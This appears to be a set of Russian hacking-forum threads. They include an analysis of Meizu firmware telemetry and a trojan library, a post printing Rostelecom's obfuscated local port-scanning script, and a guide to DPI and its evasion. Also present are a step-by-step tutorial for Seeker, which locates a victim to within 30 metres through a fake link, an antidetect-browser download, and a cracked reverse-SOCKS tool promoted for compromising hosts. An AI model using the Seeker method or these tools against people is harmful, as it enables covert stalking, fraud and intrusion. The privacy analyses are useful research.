В этот список не попали адреса Google, такие как адрес NTP-сервера и connectivitycheck.gstatic.com, но это не имеет значения в данный момент. Среди остальных адресов мы можем видеть findphone.meizu.com, который, очевидно, отвечает за службу поиска телефона. И никого не волнует, что она не включена на телефоне. Запрос-то ушел, хоть пока и только по DNS. Следующий очень интересный адрес — apilocate.amap.com, который, как понятно из названия, хочет узнать местоположение. Но давай-ка мы не будем делать преждевременных выводов, а лучше глянем, что же ушло по HTTP.

HTTP
Первый же HTTP-запрос ушел на u.meizu.com и отправил POST’ом следующую информацию:

deviceType (имя и модель устройства. У меня — «Redmi-Note4x»);
версия Firmware;
версия прошивки;
IMEI устройства (!);
ID и серийный номер устройства;
имя сервиса, отправившего информацию (в этом случае — com.meizu.battery) и его версия.

Обращаю твое внимание, что данные подписаны, а это значит, что ты не сможешь просто взять и вырезать их через прокси. Эти данные потенциально позволяют производителю определить, используешь ли ты смартфон Meizu или установил прошивку на сторонний девайс.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F06%2F227595%2Fscr_pak_208.png&hash=3a872b80f96ce18bb8b6a69c38686278)

Следующим пакетом на тот же адрес (u.meizu.com) уходит точно такой же отчет, но доносчиком значится уже фирменный лаунчер (com.meizu.flyme.launcher). Показательно, что эти данные отправляются будто бы в службу обновления фирменных сервисов, только мне, например, не совсем понятно, зачем IMEI, ID и серийный номер устройства нужны при обновлении. Но, как говорится, жираф большой, ему видней.

И действительно, в ответ на этот запрос приходит JSON, поля которого вполне подходят под заявленную цель. Среди полей есть название приложения (на китайском, несмотря на выставленную при первой настройке английскую локализацию), имя пакета, тип обновления (обязательное или нет), последняя доступная на сервере версия, время ее выпуска и release notes к ней, URL обновления, размер и хеш загружаемого файла, условия обновления и флаг тихой установки. Ты, конечно, спросишь, а что же тут не так? А не так вот что: этот запрос идет по чистому HTTP безо всяких вам SSL/TLS, что создает благоприятные условия для подмены такого трафика. И если учесть то, что обновление может быть установлено незамедлительно (флаг needsUpdate) и в тихом режиме (флаг silentUpgrade), а для проверки целостности используется только размер файла и его хеш, устройства с Flyme на борту очень легко могут стать мишенями ботнетов. Более того, твои личные данные, в том числе IMEI, ID устройства и его серийный номер, могут быть легко украдены при условии нахождения с тобой в одной сети.

Далее система получает список активити приложений, которым по умолчанию не нужно спрашивать разрешение на рисование поверх экрана блокировки. По умолчанию это экран стандартного лаунчера и некий com.tencent.mobileqq.activity.QQLSActivity. С этим именем пакета (com.tencent.mobileqq) в Play Market’е размещен довольно популярный мессенджер Tencent QQ, прочно засевший в списках антивирусных продуктов как adware.

Дальше идет обрывок ответа на запрос, принадлежность которого Wireshark не смог опознать. Как, впрочем, не поймал и его начало. Там был JSON следующего содержания:

Code:Copy to clipboard

{
  "apkName":"com.DBGame.DiabloLOL",
  "category2Id":1004,
  "category2Name":"å¨ä½åé©",
  "categoryId":2,
  "categoryName":"æ¸¸æä¸åº",
  "cnName":"ç«æ´äººèç",
  "createTime":1484690841000,
  "devName":"äºç±äºå¨ç§æ",
  "id":185417,
  "installCount":1028899,
  "stars":113710,
  "tagName":"æ¨ªç,æ ¼æ"
},{
  "apkName":"com.m37.yhjyj.mz",
  "category2Id":1001,
  "category2Name":"è§è²æ®æ¼",
  "categoryId":2,
  "categoryName":"æ¸¸æä¸åº",
  "cnName":"æ°¸æçºªå",
  "createTime":1484690855000,
  "devName":"ç¨æ·494550072",
  "id":795971,
  "installCount":1015194,
  "stars":58590,
  "tagName":"å³æ¶,å¤§ä½,éå¹»,ç»å¸"
},{
  "apkName":"com.netease.my.mz",
  "category2Id":9025,
  "category2Name":"å¶ä»æ¸¸æ",
  "categoryId":2,
  "categoryName":"æ¸¸æä¸åº",
  "cnName":"æ¢¦å¹»è¥¿æ¸¸",
  "createTime":1484690857000,
  "devName":"Netease_Game",
  "id":910997,
  "installCount":986444,
  "stars":601440,
  "tagName":"çé,ä»ä¾,Qç,å¤§ä½,ç»å¸"
},{
  "apkName":"wb.gc.xmxx.zxb",
  "category2Id":1000,
  "category2Name":"ä¼é²çæº",
  "categoryId":2,
  "categoryName":"æ¸¸æä¸åº",
  "cnNam

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F06%2F227595%2Fscr_new_pk.png&hash=dff53e72d83bbb7a845e2bbc03cdf7ca)

Налицо перечисление приложений (поле apkName, несомненно, содержит имя пакета целевого приложения) с указанием его категории (видимо, это должны были быть китайские иероглифы, но ASCII не отображает их правильно), времени создания, ID в какой-то внутренней системе, количества установок и, предположительно, рейтинга (поле stars). Адрес отправителя (183.61.122.111) наш любимый Google Public DNS опознал как soa.dns.guangzhou.gd.cn. К сожалению, на этом наш интересный пакет оборвался, но на некоторые мысли он однозначно наводит. Реклама? Скрытая установка адвари? Имена пакетов выглядят нечеловекочитаемыми, так что назначение этих программ остается неизвестным. И, что неудивительно, ни одной из них нет в Google Play.

Затем проснулся агент геолокации (на это указывает заголовок User-Agent: AMAP_Location_SDK_Android 2.4.0), который отправил 261 байт бинарных данных на apilocate.amap.com/mobile/binary.

Я уже думал прекращать просматривать однотипные пакеты, в которых уходила моя драгоценная информация, но вдруг наткнулся на один пакет, непохожий на остальные. Его содержимое:

Code:Copy to clipboard

PLQ?çØ^E,³R@,jôq`²#
P«ÿëGÏË¿>é
KÙÌmeizu.com/pack/ramcleaner/whitelist/update.db_1560182405.zip","ver":1560182405},
{"type":"patch","url":"http://safe.res.meizu.com/pack/ramcleaner/whitelist/update.db_1560268805.zip","ver":1560268805}]},
"appinfo":{"packs":[{"type":"full","url":"http://safe.res.meizu.com/pack/app/appinfo.db_1560268805_full.zip","ver":1560268805}]},
"harassmentBlocking":{"packs":[{"type":"full","url":"http://safe.res.meizu.com/pack/harassmentblocking/update.db_1560268805_full.zip","ver":1560268805}]},
"qrcodeUrl":{"packs":[{"type":"full","url":"http://safe.res.meizu.com/pack/qrcodeurl/qrcodeurl.db_1560268805_full.zip","ver":1560268805}]},
"trashclean":{"packs":[{"type":"full","url":"http://safe.res.meizu.com/pack/trash/trashclean.db_1560268805_full.zip","ver":1560268805}]}
}

Пройдемся по этим архивам по порядку:

update.db_1560182405.zip содержит единственный файл update.db. В нем перечислены сервисы Meizu с одним значением из двух (1 или 2). К сожалению, это оказалась не нормальная БД, а простой текст, так что у меня даже нет названий этих столбцов. Но если внимательно прочитать URL, по которому скачивается этот файл, то можно увидеть строку ramcleaner, указывающую, что этот файл лишь конфиг для встроенного таск-киллера. Значит, цифры, скорее всего, означают приоритеты процессов;
appinfo.db_1560268805_full.zip — JSON-файл, по структуре подозрительно похожий на тот безымянный кусок, что мы рассматривали парой абзацев выше. Ничего нового тут не оказалось;
update.db_1560268805_full.zip — список из 18 номеров спаеров (harassment blocking, упомянутый в URL, переводится как «предотвращение беспокойства»). Все номера китайские. Это все, что нужно знать об эффективности защиты, если даже на страну с населением 1,4 миллиарда человек есть список только из 18 спамеров;
qrcodeurl.db_1560268805_full.zip — девять строк JSON’а, содержащие вредоносные адреса, которые, как понятно из URL, распространяют через QR-коды.

И в последнем архиве trashclean.db_1560268805_full.zip , как становится ясно из того же источника, содержатся параметры очистки мусора в памяти устройства. Этот конфиг позволяет не потерять «критически важные» данные сервисов, названия которых явно выдают их принадлежность к Meizu. В общем, почти ничего криминального.

Я скачал эти архивы и сделал их копию на Mega на случай проблем с доступом по указанным ссылкам.
Спустя пару минут телефон скачал архив с JSON, содержащий весьма обширный (более 1700 строк) список разрешений для этих приложений и комментарии к ним на китайском. Сам архив можно взять по ссылке выше, он называется newupdate.db_1560268805_full.zip.

Внезапно пришел увесистый пакет (22,5 Кбайт), содержащий JSON-конфиг для какого-то приложения. По всей видимости, этот конфиг содержит список программ и активити, действия с которыми нужно перехватывать.

Сразу скажу, что я сначала собрал дампы трафика всех прошивок и только потом анализировал их, поэтому, когда такая засада обнаружилась, я уже не имел возможности выяснить что-либо конкретнее. Исходя из содержимого пакетов, я выдвинул две версии, что это может быть.

Первая версия: перед нами конфиг бэкдора, и вот почему я так решил.

URL (safe.meizu.com/service/corrstartapp/getrule) как бы намекает, что оттуда прилетят какие-то правила или фильтры.
Названия полей в этом JSON’е слишком уж похожи на поля конфига ратника. Пример:

Code:Copy to clipboard

    {"1":"runType===activity|||callerPkg===*|||calleePkg===*|||calleeClass===com.igexin.sdk.GActivity|||processName===*|||action===*|||data===*|||extras===*|||interception===true"}

Версия вторая: это что-то вроде базы для антивируса или блокировщика назойливой рекламы. Она более подкреплена доказательствами, так как упомянутый com.igexin.sdk.GActivity принадлежит к давно известному adware SDK. Судя по всему, встроенный антивирус перехватывает, а затем блокирует вызовы этого SDK.

Далее телефон пытается загрузить libJni_wgs2gcj.so (снова же по обычному HTTP) с amap-api.cn-hangzhou.oss-pub.aliyun- inc.com/sdkcoor/android/arm64-v8a/libJni_wgs2gcj.so. Я не мастер реверса бинарников, но я посмотрел hex-дамп этого файла и увидел интересные строки, указывающие на обфускацию. Но зачем не столь уж секретной библиотеке обфускация? А может, ее содержимое не совсем соответствует названию? Есть только один способ выяснить ее реальную функциональность: погуглить. Гугление выдает информацию, что это чистой воды троян, причем попал он в антивирусные базы еще в далеком августе 2017 года.

![Обфускация?](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F06%2F227595%2Fscr_obfuscated.png&hash=6d1b2682e4505f46dbe013fb298a2837)
Обфускация?

И чтобы ты не радовался, что хоть какие-то данные еще остались у тебя, вот последний логический гвоздь в крышку гроба твоей надежды:

Code:Copy to clipboard

{
  "priority_directory": [
    "DingTalk",
    "tencent/MobileQQ/shortvideo",
    "tencent/MicroMsg/WeiXin",
    "tencent/MicroMsg/Download",
    "Pictures/Screenshots",
    "Download",
    "Movies/Screenrecords",
    "iqiyi",
    "iqiyi_live",
    "iqiyi_p2p",
    "UCDownloads",
    "kugou",
    "kugoumusic",
    "kgmusic",
    "QQLive",
    "qqmusic",
    "Sina/weibo/weibo",
    "Sina/weibo/weibo_filter",
    "DCIM"
  ]
}

Да, это список папок в твоей внутренней памяти. Помаши ручкой улетающей приватности, ведь теперь все твои данные, включая фотки и видео с котиками, доступны неограниченному кругу лиц, которые даже знают все возможные места, где это искать.

Думаю, при дальнейшем рассмотрении этой прошивки мы не увидим ничего интереснее, чем уже увидели до этого. Предлагаю перейти сразу к анализу трафика прошивки после судорожных попыток хоть что-нибудь отключить.

После максимальной очистки
После очистки, то есть отключения всех фирменных приложений Meizu и принудительного убийства всех сервисов, пакетов стало на порядок меньше: 477 против 7661. Появился новый хост (log.avlyun.com), на который телефон передал 4,2 Кбайт данных по TLS. В HTTP-трафике почти чисто, проснулся только калькулятор (com.meizu.flyme.calculator) и отправил статистику. Возможно, это связано с тем, что за прошедший перед этим час прошивка уже успела отправить все, что хотела, и сейчас решила заслуженно отдохнуть.

Мой вердикт лучше всего опишет белорусская фраза «Не чапай, бо лясне». Просто не трогай эту прошивку, и тебя минует участь подопытного кролика, за которым день и ночь пристально следят страшные дяди и тети. Видя, что передается в открытую, я никак не могу назвать этого шпиона прошивкой для настоящего хакера.

Выводы
Сегодня мы затронули только верхушку айсберга кастомных прошивок. Естественно, я выбрал для этого обзора только самых вкусных представителей этого большого семейства, но, как ты понял, если прошивку разрабатывает вендор (а в особенности — китайский), то про собственную приватность можешь забыть. Мой выбор — LineageOS, и я всячески тебе его советую в качестве достойной альтернативы MIUI и Flyme.

Автор: Hackcat

github.com

HackcatDev - Overview

Free researcher & Hacker. HackcatDev has 17 repositories available. Follow their code on GitHub.

github.com

Сканер портов в личном кабинете Ростелекома

ID: 676533bbb4103b69df371d49
Thread ID: 29837
Created: 2019-06-18T17:13:01+0000
Last Post: 2019-06-23T10:38:41+0000
Author: pablo
Replies: 3 Views: 3K

Сегодня я совершенно случайно обнаружил, что личный кабинет Ростелекома занимается совершенно вредоносной деятельностью, а именно, сканирует локальные сервисы на моём компьютере. Так как добиться от Ростелекома вменяемой информации практически нереально, решил указать про данную проблему на Хабре, чтобы хабровчане были в курсе, что можно ожидать весьма сомнительное поведение даже от крупных и серьёзных игроков.

А теперь, собственно детали.
Придя утром на работу, я обнаружил в логе системы замечательные строчки от VNC:

Code:Copy to clipboard

Connections: rejecting blacklisted connection: 127.0.0.1::22715

Т.е. кто-то с локалхоста пытается залезть на порт 5900, значит это вирус или ещё что-то похуже. Конечно же, меня пробил холодный пот, и я пошёл искать данного вредителя. Быстрый анализ показал, что долбёжка идёт каждые 10 минут и делается 11 попыток подключиться. Осталось выяснить, кто это делает.

Раз коннекшен блокируется, надо сделать так, чтобы кто-то сидел на нём. Самый простой способ для меня оказался в том, чтобы поднять на ноде интеллектуальный tcp-сервер, который ничего не делает и просто держит соединение.

Code:Copy to clipboard

server.listen(5900, function () {});

Посмотрел, кто туда подключился, оказалось, что это Firefox:

Дальше я пошёл выяснять, какой же из табов или расширений фаерфокса это делает. Оказалось, что ни about:peformance, ни about:networking не показывают id процесса, который может делать сетевые запросы. Зато я выяснил, что это основной процесс браузера, а не дополнительный для вкладок или расширений, что затруднило выяснение вредителя (да, у меня как всегда открыта куча вкладок и найти нужную — достаточно тяжело).

Но с помощью терпения, я нашёл замечательную вкладку, в девелоперской консоли которой оказались замечательные строчки:

И этой вкладкой оказался Личный кабинет Ростелекома. После этого выяснилось, что запросы идут следующего вида:

14 достаточно интересных портов:

Порт| Описание
---|---
5900| VNC
6900| Bittorrent
5650| Pizza trojan
5931| ?
5938| TeamViewer
5939| ?
3389| RDP
8080| HTTP
51| F**k Lamers Backdoor
443| HTTPS
80| HTTP
22| SSH
445| SMB
5985| Microsoft Windows Remote Management

Большинство портов — это средства для удалённого управления компьютером. Выходит, далее следует ожидать попыток проникновения на эти порты снаружи. Зачем это может быть?
У меня в голове следующие варианты:

Личный кабинет взломан, и идёт попытка выяснить уязвимые компьютеры и подсадить пользователю троян
Это осознанное решение Ростелекома и попытка сделать что-то нехорошее пользователю
Это осознанное решение Ростелекома и попытка собрать данные о пользователе

При этом мой компьютер не находится в сети Ростелекома, так что данные действия выглядят весьма и весьма грязно.

UPD: Дополнение от @sashablashenkov

Судя по этой странице, это какой-то Dynatrace Real user monitoring

Dynatrace is the only vendor to capture the full visibility of customer experience across every digital transaction. No sampling of data, Dynatrace gives you a complete picture, from the frontend to the backend.
Monitor user journeys
Replay individual customer transactions for rapid problem handling
Dynatrace provides a single problem notification that identifies the root cause of the problem
Identify and resolve technical issues proactively

Но зачем оно сканирует порты — не понять

Click to expand...

UPD2: Это не Dynatrace, а group-ib

Ещё немножко деталей. Скрипт находится по адресу:

Code:Copy to clipboard

https://lk.rt.ru/ruxitagentjs_ICA2SVfhqrux_10169190521113456.js

Т.е. это не какие-то внешние счётчики или аналитика, а собственный скрипт.

Данный скрипт обфусцирован и функция, обращающаяся к портам выглядит как-то так:

Code:Copy to clipboard

Aa: function () {
        var a = this.Tg();
        this.Qh(a);
        for (var e = 0; e < this.Ye.length; e++) (function (c, f) {
          if (!d.F.N(f.Gg, c) || !d.T.jh() || d.T.wb() || d.T.dc()) {
            var e = (new Date).getTime(),
            g = d.D.mb(Oa(1939), window.location[Ma(1402)] + $e(1358) + c),
            k;
            g.then(function () {
              clearTimeout(k);
              f.Ec(c, ua(1117), (new Date).getTime() - e, a)
            }).then(void 0, function () {
              clearTimeout(k);
              f.wc[c] ? delete f.wc[c] : f.Ec(c, Lb(1430), (new Date).getTime() - e, a)
            });
            k = G(function () {
              f.wc[c] = !0;
              g.te().abort();
              f.Ec(c, Mc(1251), (new Date).getTime() - e, a)
            }, f.$e || 10000)
          }
        }) (this.Ye[e], this)
      },

В массиве Ye, как раз и содержатся данные 14 портов, инициализируется он таким образом:

Code:Copy to clipboard

this.Ye = b[Uh(1218)];

Т.е. кроме минификации, в Ростелекоме добавили ещё и обфускацию, значит они подозревали, что делают что-то не очень хорошее, и надо бы это скрыть.

Блокируйте порт 5900.

автор: @force

Всевидящее око DPI. Как работает глубокая инспекция пакетов и как от нее скрыться.

ID: 676533bbb4103b69df371d4c
Thread ID: 29644
Created: 2019-06-04T06:40:18+0000
Last Post: 2019-06-05T19:47:55+0000
Author: SEAdm1n
Prefix: Статья
Replies: 1 Views: 3K

Провайдеры и DPI
Сетевая модель
Анализ пакетов данных
HTTP
BitTorrent
VoIP
Методы сопротивления
Заключение

Многие страны мира начали повсеместно внедрять технологии для слежки за своими гражданами и анализа их поведения. Механизмы вроде DPI ограничивают нашу свободу в Сети. Чтобы вступить в честный бой с этими механизмами, очень важно разобраться, как все устроено внутри.

Провайдеры и DPI
У провайдеров есть две проблемы:

они обязаны ограничивать доступ к некоторым данным в соответствии с законом;
ни одна компания не хочет платить лишние деньги за собственное соединение с провайдером уровня выше, которое, очевидно, тарифицируется.

И та и другая проблема решается ограничением отдельных запросов или протоколов, с чем справляется тот самый глубокий анализ пакетов — DPI.

Рядовых пользователей это лишает многих возможностей. Провайдер, например, способен заблокировать или сильно замедлить весь трафик протокола BitTorrent, так что качать торренты станет невозможно. Или, ради дополнительной выгоды, может «отключать» VoIP и Skype для всех пользователей, кроме тех, кто специально оплатил доступ.

DPI способен обнаруживать и пресекать соединения по определенным правилам, а их возможности зависят от производителя оборудования. Единственное, что их объединяет, — DPI работает начиная с транспортного уровня сетевой модели.

Сетевая модель
Компьютерные сети устроены таким образом, чтобы работать над сложными приложениями, не думая о кабелях и битах.

Для этого было определено четыре степени абстракции. Каждый следующий шаг вверх упрощает работу с информацией, которая передается по сети.

Самый первый уровень связи основан на физических процессах. Он позволяет определять и связывать устройства, работая с аппаратными адресами: это в первую очередь ARP, L2TP и PPP.
Второй слой, уровень маршрутизации, затрагивает адреса IP и создает логическую связь между узлами IPv4, IPv6 и IPsec. Оба эти уровня — ключевые, они описывают основу, то, как компьютеры могут друг друга найти.
Третий уровень — транспортный — занимается данными: что передавать и насколько качественно это делать. TCP и UDP — два ключевых протокола, которые занимаются передачей данных на этом уровне, обеспечивают сохранность информации и ее порядок. Благодаря им все соединения строго регулируются.
Последний, четвертый уровень — прикладной, поэтому его описание очень широко (из-за невообразимо большого количества протоколов), а использование не обязательно, не все приложения это делают. Но если используют, то за дело берутся протоколы HTTP и WebSocket, чтобы ты мог сидеть в интернете, играть в MMORPG и чатиться. Протокол FTP используется в основном для обмена файлами, а POP и IMAP — электронной почтой.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F06%2F224707%2Fosi- scheme.jpg%2326157956&hash=63aa0379110db70ea664ad9ba35c25ef)
Пример инкапсуляции данных через соединение HTTP
Оборудование DPI обычно работает с транспортным уровнем, пакетами TCP и UDP, читая не только заголовки, но и содержимое пакетов.

Анализ пакетов данных
Любой протокол имеет свою четко обозначенную внутреннюю логику, а также специальные сигнатуры, которые позволяют участникам соединения определять, кто и о чем говорит.

HTTP
Давай разберемся, например, с HTTP — самым популярным протоколом. Отправим запрос на http://xakep.ru

GET / HTTP/1.1
Host: xakep.ru

Стандартный запрос браузера: он отправляется на IP 178.248.232.27 (адрес сервера сайта, известен всем, так как используется для адресации), запрашивает файл по адресу / на сайте xakep.ru (директива Host ). Ключ к определению трафика HTTP — его характерный заголовок.

Первые символы до первого пробела — название метода: GET, POST, HEAD, — ключевые. Конечно, есть и другие, но эти три занимают более 97% от всех запросов HTTP.
Символы от второго пробела и до конца строки — версия запроса. Обычно это HTTP/1.1 или HTTP/1.0

Все эти данные можно использовать, чтобы понять, какой это запрос и куда он идет. А если известен пункт назначения, то можно принять решение о блокировке или, в случае с xakep.ru , о приоритизации соединения.Но в современном мире все больше распространяется HTTPS, что же с ним?

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F06%2F224707%2Fgraph.jpg%2326157956&hash=3cb7874cc3af68fa0bc104492b3d7afe)
Доля трафика HTTPS в интернете
Из-за шифрования прочитать содержимое без подготовки невозможно. Есть один способ это сделать — атака Man in the Middle, когда злоумышленник (или провайдер) внедряется в соединение, представляясь пользователю сервером, а серверу — настоящим клиентом.

Но такое требует полного доступа к компьютеру жертвы, так как сертификат (а вместе с ним и ключ), который используется для защиты соединения, подписан, и никто не может его изменить.

В таком случае провайдерам ничего не остается, кроме как блокировать трафик по единственной составляющей — адресу IP, что приводит к блокировке не отдельной страницы (как могло бы быть без HTTPS), а всего ресурса, а если не повезет, то и нескольких других, располагающихся на том же оборудовании.

BitTorrent
Из-за большого объема трафика, который передается через пиринг, провайдеры иногда пытаются ограничить скорость таких передач. Алгоритм передачи данных в пиринговых сетях значительно сложнее по сравнению с алгоритмом HTTP, но разработчики DPI нашли способ идентифицировать и его.

Если разбирать протокол именно сетей BitTorrent, то его можно разложить на несколько отдельных элементов, каждый из которых представляет собой набор относительно легко идентифицируемых соединений. Соединения в µTorrent всегда начинаются либо с файла *.torrent , либо с магнитной ссылки. Внутри заключена информация о файлах в формате Bencode: название файлов, структура папок, схема деления на части и, конечно, так называемые трекеры (announce).

{
"announce": "http://torrent.ubuntu.com:6969/announce",
"announce-list": [
[
"http://torrent.ubuntu.com:6969/announce"
],
[
"http://ipv6.torrent.ubuntu.com:6969/announce"
]
],
"comment": "Ubuntu CD releases.ubuntu.com",
"creation date": 1550184717,
"info": {
"length": 1996488704,
"name": "ubuntu-18.04.2-desktop-amd64.iso",
"piece length": 524288,
"pieces": 0x5D 0x9D 0xCD 0x4F ... 0x29 0x24 0x57 0xF0,
}
}

Это преобразованное в читаемый вид содержимое файла torrent с дистрибутивом Ubuntu 18.04. Самое главное — то, что в нем описаны трекеры — специальные регуляторы. Обычно это просто серверы HTTP, которые знают, кто из других участников сети готов отдавать тебе новые данные, а также следят за твоим прогрессом и статусом в системе.

Первым этапом для скачивания торрента будет запрос пиров через HTTP или TCP, который системы DPI способны обнаружить либо по IP, либо по директиве Host в запросе. Кроме этого, в теле запроса обязательно будет Bencode — характерный исключительно для соединений BitTorrent.Вторым этапом идет обмен рукопожатиями с только что полученными пирами. Для каждого из них специально хранятся четыре параметра: am_choked и peer_choked — запрещена ли передача данных от пира и обратно, am_interested и peer_interested — есть ли у пира или у меня что-то ценное для передачи.

Рукопожатие с пирами, как и запрос к трекеру, заполнено данными (идентификатор клиента, хеши файлов и так далее) с помощью Bencode. Это позволяет облегчить задачу идентификации. Более того, в зависимости от версии протокола и клиента внутри данных может содержаться строка BitTorrent protocol (или другая, характерная для клиента), что еще больше упрощает идентификацию.Третий этап общения, а именно обмен данными происходит через соединение UDP. Сообщения управляют потоком данных и состояниями choked и interested и, главное, передают сами данные. Часть этих сообщений имеет строго фиксированную длину тела запроса. Это может послужить зацепкой в исследовании трафика оборудованием DPI.

Эти этапы заметны, что позволяет анализирующему оборудованию легко обнаруживать и, соответственно, блокировать и замедлять соединение. Некоторые производители обрубают попытки соединения на корню. Другие же, более смекалистые, подделывают трафик так, что для клиента все выглядит как обычно, но загрузка не идет.

VoIP
Voice over Internet Protocol — важнейшая часть современного общения. Только Skype пользуются 300 миллионов человек в месяц. При помощи этой технологии совершаются звонки в WhatsApp, Telegram, Viber и не только.

Конечно, обстановка в отношениях между VoIP и DPI менее напряженная, так как нет ни строгого регламента взаимодействия двух клиентов, ни общего формата данных, а некоторые приложения так и вовсе шифруют соединение.

На помощь анализатору приходит SIP (Session Initiation Protocol) — протокол, описывающий то, как клиенты начинают, регулируют и заканчивают общение между собой. Внутри описывается несколько параметров, причем в таком же формате, как и HTTP, и благодаря этому легко отслеживается.

INVITE sip:10100@192.46.18.48 SIP/2.0

Click to expand...

From: "User 1" sip:10100@192.46.18.48

Click to expand...

To: "User 2" sip:1201@192.42.20.22

Click to expand...

Call-ID: 22a1c6b515ecee@192.46.18.48

Click to expand...

Max-Forwards: 10

Click to expand...

Как и HTTP, SIP имеет собственные трехзначные статусы, которые передаются в открытую, и все это в комплекте позволяет DPI если не с первого, то со второго или третьего пакета данных определить протокол и немедленно предпринять необходимые действия.

Методы сопротивления
В борьбе с DPI важно обмануть сканер, который рассчитан на обычные запросы. Небольшие изменения в структуре запросов помешают его работе.

Лучшим способом ввести анализатор в заблуждение будет полностью зашифровать пакет данных и отправить его на личный, никому не известный сервер в интернете, который расшифрует данные и выполнит запрос. Ровно такую методологию предлагает obfs4proxy.

Изначально придуманный как посредник при передаче данных в сети Tor, obfs4 может также работать в режиме клиента и сервера, позволяя практически любому приложению перенаправить трафик в обфусцированный туннель. С этим отлично справляется, например, OpenVPN, создающий еще и защищенный шифрованием канал данных.

OpenVPN может также изображать легитимный трафик HTTPS, который анализатор DPI сочтет самым обыкновенным.

Этого можно достичь, перенаправив поток VPN через порт 443 вместо стандартного 1194 , но это помогает не всегда. Или можно использовать stunnel в качестве туннеля SSL. Тогда шифрование SSL сделает запросы HTTPS практически неотличимыми от пакетов данных туннеля, помогая скрываться от грозного ока DPI.

Можно попытаться и напрямую обмануть анализатор трюками из мира сегментов TCP. Методика разделения длинных пакетов на маленькие для уменьшения потерь использует параметр TCP Window Size , регулирующий поток данных через соединение. Предварительная установка его в значение 2 для каждого пакета разделит последний на два сегмента.

Первый:

Второй:

T / HTTP/1.1

Click to expand...

Host: xakep.ru

Click to expand...

Ни один из этих пакетов не будет воспринят как валидное соединение HTTP, и поэтому соединение пройдет все фильтры.

Блокировку по адресу сайта (по директиве Host ) обойдет и такой запрос:

GET / HTTP/1.1

Click to expand...

hOSt:xaKeP.RU

Click to expand...

Чтобы не пришлось обфусцировать каждый пакет вручную, есть утилита GoodbyeDPI, которая делает эту работу за тебя. Она позволяет подобрать наилучшие комбинации изменений, чтобы твой запрос миновал всевидящее око DPI.

INFO
Подробно об утилитах для сокрытия своего трафика я писал в статье [«Краткий справочник анонима. Виды шифрования и защиты трафика, выбор софта».](https://tgraph.io/Kratkij-spravochnik-anonima-Vidy-shifrovaniya-i- zashchity-trafika-vybor-softa-05-24)

Заключение
Как видишь, алгоритмы анализа трафика идут вровень с технологиями обхода. Каждый новый шаг в развитии слежки за трафиком пользователей будет усложнять схему получения доступа к «чистому» интернету. Сообщество активных пользователей стремится сохранить интернет свободным от контроля и цензуры, и благодаря этому мы можем продолжать работать в открытой сети.

Азы цифровой слежки. Вычисляем местоположение человека с точностью ~30 метров

ID: 676533bbb4103b69df371ca6
Thread ID: 30428
Created: 2019-07-15T14:57:34+0000
Last Post: 2020-08-29T11:37:42+0000
Author: tabac
Prefix: Статья
Replies: 7 Views: 3K

Всем привет, дорогие друзья!
Сегодня я решил рассказать вам о том, как можно отследить местоположение любого человека с точностью до 30 метров. Это база, азы цифровой слежки. Проще

для новичков.

Нам понадобится:

Kali Linux
Seeker

Seeker - Скрипт для поиска местоположения человека. Посредством перехода по ссылки , также используется ngrok.

Seeker использует HTML5, Javascript, JQuery и PHP для захвата информации об устройстве и геолокации с высокой точностью.

**Точность полученной информации равняется от 1 до 30 метров.

Принцип действия Seeker:**

Он размещает поддельный веб-сайт на Apache Server и использует Ngrok , которая запрашивает разрешение на размещение, и если пользователь ее разрешает, мы можем получить:

Долгота.
Широта.
Точность.
Высота - не всегда доступна.
Направление - доступно только в том случае, если пользователь движется.
Скорость - доступна только в том случае, если пользователь движется.

Наряду с информацией о местоположении мы также можем получить информацию об устройстве без каких-либо разрешений:

Операционная система.
Платформа.
Количество ядер процессора.
Объем оперативной памяти - приблизительные результаты.
Разрешение экрана.
Информация о GPU.
Имя и версия браузера.
Открытый IP-адрес.

Установка:

Открываем терминал Кали
Вводим команды:

Bash:Copy to clipboard

git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod 777 install.sh
./install.sh
seeker

Запускаем:
- python seeker.py

Жертва переходит по сгенерированной ссылке и разрешает доступ к геолокации.
И увидим его местоположение.
Сразу можно открыть google map.

Видео:

Антидетект своими руками. Мануал.

ID: 676533bbb4103b69df371cac
Thread ID: 34461
Created: 2020-01-19T16:15:55+0000
Last Post: 2020-08-13T22:52:27+0000
Author: marc
Prefix: Мануал/Книга
Replies: 7 Views: 3K

Мануал как сделать браузер антидетект своими руками.

[CLIKE]Скачать: https://www.sendspace.com/file/t533dw пароль: xss[/CLIKE]

MOFO Linux Обзор. Операционная система для обхода блокировок

ID: 676533bbb4103b69df371d4d
Thread ID: 29607
Created: 2019-06-02T12:54:11+0000
Last Post: 2019-06-02T19:36:15+0000
Author: Fogg
Replies: 1 Views: 3K

Реверсный сокс Reverse Proxy 3

ID: 676533bbb4103b69df371d5c
Thread ID: 23493
Created: 2012-10-23T11:12:55+0000
Last Post: 2019-04-21T22:40:43+0000
Author: Wolfomeo
Replies: 5 Views: 3K

Универсальная утилита для организации реверсного сокса, со случайно найденным рабочим регистрационным ключем!

Размер упакованного UPX'ом билда: 90 кб.
Работоспособен на 32 /64 : Win2k, XP, Vista, Seven
Шифрование трафика: AES-256 RC4
И много других нужных плюшек.

Для активации, запустить reverse.reg , по надобности, зарегистрировать необходимые для работы программы OCX - Registrator.exe

P.S. Удобно скомпрометировать нужный IP

Скачать
Пароль на архив: A)K-,#DfbdQ^i <dEi.lj.65-1SrNo$8W

Click to expand...

Сервер Jabber

ID: 676533bbb4103b69df371d63
Thread ID: 28127
Created: 2019-03-05T08:19:10+0000
Last Post: 2019-03-18T15:39:07+0000
Author: PandaFx
Replies: 12 Views: 3K

Всем привет
У меня такой вопрос как создать собственный сервер jabber?
Я перерыл весь гугл и ютуб как создать его, нашел много материала пробовал создавать на openfire и edjabber, как на винде так и на линьке debian, ubuntu.
И ни фига, все делал по инструкциям купил домен использовал разные хостинг timeweb, infinityfree вроде все норм, создал учетки для jabber, а при конекте пишет что "Соединение с opt@домен/ разорвано", либо "Не удаётся установить соединение". На домен установил ssl, сам домен привязывал к серверам. Возможно эти хостинги не подходят для жабы я в деле новичек
